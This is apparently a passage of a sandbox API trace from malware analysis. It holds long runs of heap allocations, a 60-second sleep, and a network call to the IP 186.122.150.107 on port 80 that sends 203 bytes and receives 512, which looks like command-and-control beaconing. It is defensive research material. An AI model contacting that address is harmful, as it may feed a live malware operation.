0x27f0788 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f17c8 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f21f0 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f13b8 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f0da0 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f3c58 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f0990 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f0170 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f1bd8 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f0b98 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2809ed0 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2808f10 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x280a0c8 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x280a2c0 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x280ac98 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x280b088 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2807968 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2807b60 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2807f50 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x280b868 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27fd7f8 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27fc640 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27fdde0 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27fe3c8 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27fe7b8 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27ff388 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2857e90 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2855e28 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2856b80 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x28550d0 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2858be8 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2856f50 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2857508 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2855870 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x28576f0 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x28578d8 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2855a58 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x28561f8 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x28552b8 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2855c40 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2856d68 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2855688 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283a3a0 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283b9c0 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283b088 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283b610 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2838448 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283b260 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283a928 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2839a68 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283b438 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2838098 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2839130 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283a578 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283a750 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283acd8 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2839c40 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2838270 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a5518 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a58a8 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a3c28 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a46d8 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a7198 [0260.825] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a48a0 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a3fb8 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a5a70 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a5e00 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a4c30 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a6a78 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a5c38 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a4df8 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a3df0 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a4fc0 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a5fc8 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2865968 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2867858 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2866728 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2866048 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2865b20 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2865cd8 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2867178 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2867bc8 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2866200 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2866570 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x28668e0 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x28674e8 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x28657b0 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x28650d0 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2867a10 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2866c50 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28438f0 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2847988 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2847cd8 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2847140 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28472e8 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2847490 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2846f98 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2847b30 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2847638 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2847e80 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28477e0 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2846aa0 [0260.826] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2846c48 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2846df0 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ebda8 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28e9fd8 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2872a18 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2870f00 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2871098 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2870a38 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2872088 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2873210 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2872550 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2871890 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x28713c8 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x28726e8 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2872d48 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2871560 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2872880 [0260.827] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x28716f8 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2872bb0 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x28703d8 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2820560 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2821638 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281f798 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x28203d8 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2821018 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x28200c8 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2821f68 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x28206e8 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281fc30 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281f920 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281f178 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281faa8 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281f300 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281fdb8 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2820870 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2820b80 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x287aa78 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2878e90 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x287a320 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2877fe0 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x28792f8 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x28798d8 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x287abf0 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x287a788 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2878448 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x28785c0 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2879008 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2879180 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x287a900 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2878a28 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2879a50 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x28788b0 [0260.828] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28ab5b8 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aa208 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aa910 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aaa78 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28ab018 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28ab9f0 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28a96c8 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aad48 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28ab720 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aa0a0 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aa4d8 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28ab888 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28abb58 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aa640 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28a9290 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28a93f8 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280fb90 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280ef78 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2810e60 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280f0d0 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280f380 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2811110 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2810248 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280fce8 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280ecc8 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280e768 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28103a0 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280ea18 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280eb70 [0260.829] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28ef440 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28ee578 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28ef2e8 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b5f60 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b60a8 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b45c0 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b4c28 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b4d70 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b40a0 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b5668 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b61f0 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b4eb8 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b4708 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b5cd0 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b4998 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b5000 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b3b80 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b5520 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b4850 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2828d50 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2827148 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2827d78 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2828ae0 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2828c18 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x28269f8 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x28268c0 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2827010 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2827280 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2828390 [0260.830] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x28284c8 [0260.840] Sleep (dwMilliseconds=0xea60) [0270.865] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0270.865] socket (af=2, type=1, protocol=6) returned 0x2bc [0270.867] htons (hostshort=0x50) returned 0x5000 [0270.867] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0270.867] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0270.869] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0270.869] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0270.869] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0270.869] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0271.131] send (s=0x2bc, buf=0x19d8f8*, len=203, flags=0) returned 203 [0271.131] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0271.401] closesocket (s=0x2bc) returned 0 [0271.402] WSACleanup () returned 0 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28cf0a0 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28d1548 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28d0408 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28d0ed0 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28cf718 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28d1320 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28d1998 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28d1bc0 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28d0630 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28d2010 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28ce3b0 [0271.402] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28cfb68 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28cee78 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28cf4f0 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28cf940 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d01e0 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d0ca8 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d10f8 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d5820 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d4f80 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d5a48 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d4b30 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d5c70 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d2d00 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d4d58 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d3378 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d51a8 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d2460 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d4068 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28d4290 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2911578 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x290d888 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x290f700 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2910740 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x290f908 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2910f60 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x290e6c0 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x290dea0 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2911168 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x290fd18 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x290e0a8 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2910128 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2910538 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, 